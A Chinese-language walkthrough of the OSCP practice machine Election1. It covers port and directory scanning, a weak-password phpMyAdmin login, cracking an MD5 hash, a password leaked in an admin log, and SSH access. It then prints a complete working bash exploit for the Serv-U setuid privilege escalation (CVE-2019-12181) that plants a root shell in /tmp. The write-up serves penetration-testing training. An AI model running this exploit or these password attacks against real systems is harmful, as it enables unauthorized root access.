OSCP官方靶场-Election1-WP
关注泷羽Sec和泷羽Sec-静安公众号,这里会定期更新与 OSCP、渗透测试等相关的最新文章,帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具
代理链接VPN
proxychains sudo openvpn universal.ovpn官网打开靶场或链接地址下载虚拟镜像:
信息收集
# Kali攻击机地址
192.168.45.168
# 靶机地址
192.168.195.211扫描端口和目录
# 设置MTU
sudo ip link set dev tun0 mtu 1250
ip link show tun0
# 扫描端口
ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.195.211 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
# 扫描服务
sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.195.211
sudo nmap --script=vuln -p$ports -Pn 192.168.195.211
# 扫描目录
gobuster dir -e -u http://192.168.195.211 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
whatweb http://192.168.195.211/扫描结果如下:
┌──(kali㉿kali)-[~]
└─$ ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.195.211 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
┌──(kali㉿kali)-[~]
└─$ echo $ports
22,80,15552,17682,34185,35675
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.195.211
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 01:55 -0400
Nmap scan report for 192.168.195.211
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
| 256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_ 256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
15552/tcp closed unknown
17682/tcp closed unknown
34185/tcp closed unknown
35675/tcp closed unknown
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.84 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.195.211
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 01:56 -0400
Nmap scan report for 192.168.195.211
Host is up (0.23s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.'
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /robots.txt: Robots file
| /phpinfo.php: Possible information file
|_ /phpmyadmin/: phpMyAdmin
15552/tcp closed unknown
17682/tcp closed unknown
34185/tcp closed unknown
35675/tcp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 265.92 seconds主页是个配置页面没什么
查看robots.txt 发现隐藏目录
admin
wordpress
user
election打开目录是一个投票页面
提示登录admin后给候选人投票
根据Nmap扫描结果发现有php页面,看到还开放了文件包含
Nmap扫描发现phpmyadmin后台管理页面
phpMyAdmin 弱密码登录
爆破弱密码使用
复制一个字典过来
cp /usr/share/wordlists/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt ./wordlists/password.txt
弱密码登录即可
root toor
发现存在疑似用户id和密码的表
解码这个md5得到一个密码
bb113886b0513a9d882e3caa5cd73314
此时我们得到的信息是
| id | no_induk | nama | level | password |
|---|---|---|---|---|
| 1 | 1234 | Love | 1 | bb113886b0513a9d882e3caa5cd73314 |
1234 Love Zxc123!@# 投票系统log泄露密码
把投票页面补全admin,http://192.168.195.211/election/admin 尝试登陆到后台发现要输入ID,就输入1234
在输入密码 Zxc123!@#
系统设置里面有个查看log的选项,点开查看发现泄露的密码。
结合之前的Nmap扫描结果,怀疑这个密码是ssh登录的密码
Assigned Password for the user love: P@$$w0rd@123SSH登录
获得local.txt的flag
ssh love@192.168.195.211
提权root
查找提权点
find / -type f -perm -u=s 2>/dev/null
发现异常文件
/usr/local/Serv-U/Serv-U尝试运行
查看所在目录,发现版本信息文件
提示了软件版本号 Serv-U File Server (64-bit) - Version 15.1 (15.1.6.25),搜索相关漏洞
发现两个Poc均指向漏洞编号 CVE-2019-12181
https://github.com/trickest/cve/blob/main/2019/CVE-2019-12181.md
c脚本还需要编译,所以先使用sh脚本的版本,尝试开启http传输发现网络波动太大,传输有问题,所以直接复制sh文件内容,使用cat > exp.sh 的方法写入,按ctrl D结束,然后添加执行权限。
#!/bin/bash
# SUroot - Local root exploit for Serv-U FTP Server versions prior to 15.1.7 (CVE-2019-12181)
# Bash variant of Guy Levin's Serv-U FTP Server exploit:
# - https://github.com/guywhataguy/CVE-2019-12181
# ---
# user@debian-9-6-0-x64-xfce:~/Desktop$ ./SUroot
# [*] Launching Serv-U ...
# sh: 1: : Permission denied
# [+] Success:
# -rwsr-xr-x 1 root root 117208 Jun 28 23:21 /tmp/sh
# [*] Launching root shell: /tmp/sh
# sh-4.4# id
# uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),117(scanner)
# ---
# <bcoles@gmail.com>
# https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181
if ! test -u "/usr/local/Serv-U/Serv-U"; then
echo '[-] /usr/local/Serv-U/Serv-U is not setuid root'
exit 1
fi
echo "[*] Launching Serv-U ..."
/bin/bash -c 'exec -a "\";cp /bin/bash /tmp/sh; chown root /tmp/sh; chmod u+sx /tmp/sh;\"" /usr/local/Serv-U/Serv-U -prepareinstallation'
if ! test -u "/tmp/sh"; then
echo '[-] Failed'
/bin/rm "/tmp/sh"
exit 1
fi
echo '[+] Success:'
/bin/ls -la /tmp/sh
echo "[*] Launching root shell: /tmp/sh"
/tmp/sh -p C脚本的方法尝试也成功了
总结
入侵路径示意图
flowchart TD
%% 资产列表
A[Kali攻击机 <br> 192.168.45.168]
B[靶机 <br> 192.168.195.211]
C[election目录 ]
D[phpmyadmin后台 ]
E[SSH登录]
F[root]
%% 路径关系
A-->|扫描|B
B-->|robots.txt泄露|C
A-->|Nmap扫描|D
D-->|数据库md5解密得到election投票管理员密码|C
C-->|管理员界面log页面泄露SSH登录密码|E
E-->|CVE-2019-12181 漏洞提权|F
%% 线型:---(实线)、-.->(虚线)、==>(粗箭头)
%% -->|是|:带条件文本的连接
%% 矩形节点[ ],菱形决策节点{ },圆弧方节点()
%% 样式定义
classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px;
classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px;
%% 线型与颜色方案(亮色/暗色通用)
linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0;
%% 应用样式
class A attack;
class B,D public;
class C internal;
入侵时间表
gantt
title 攻击时间表
dateFormat YYYY-MM-DD HH:mm
axisFormat %H:%M
section 侦察阶段
目标扫描 :a1, 2026-03-13 13:30, 2026-03-13 14:09
漏洞识别 :a2, after a1, 2026-03-13 14:51
section 攻击阶段
初始访问 :b1, after a2, 3m
权限提升 :crit,b2, after b1, 2026-03-13 15:20
🔔 想要获取更多网络安全与编程技术干货?
关注 泷羽Sec-静安 公众号,与你一起探索前沿技术,分享实用的学习资源与工具。我们专注于深入分析,拒绝浮躁,只做最实用的技术分享!💻
马上加入我们,共同成长!🌟
👉 长按或扫描二维码关注公众号
直接回复文章中的关键词,获取更多技术资料与书单推荐!📚
推荐阅读
.jpeg)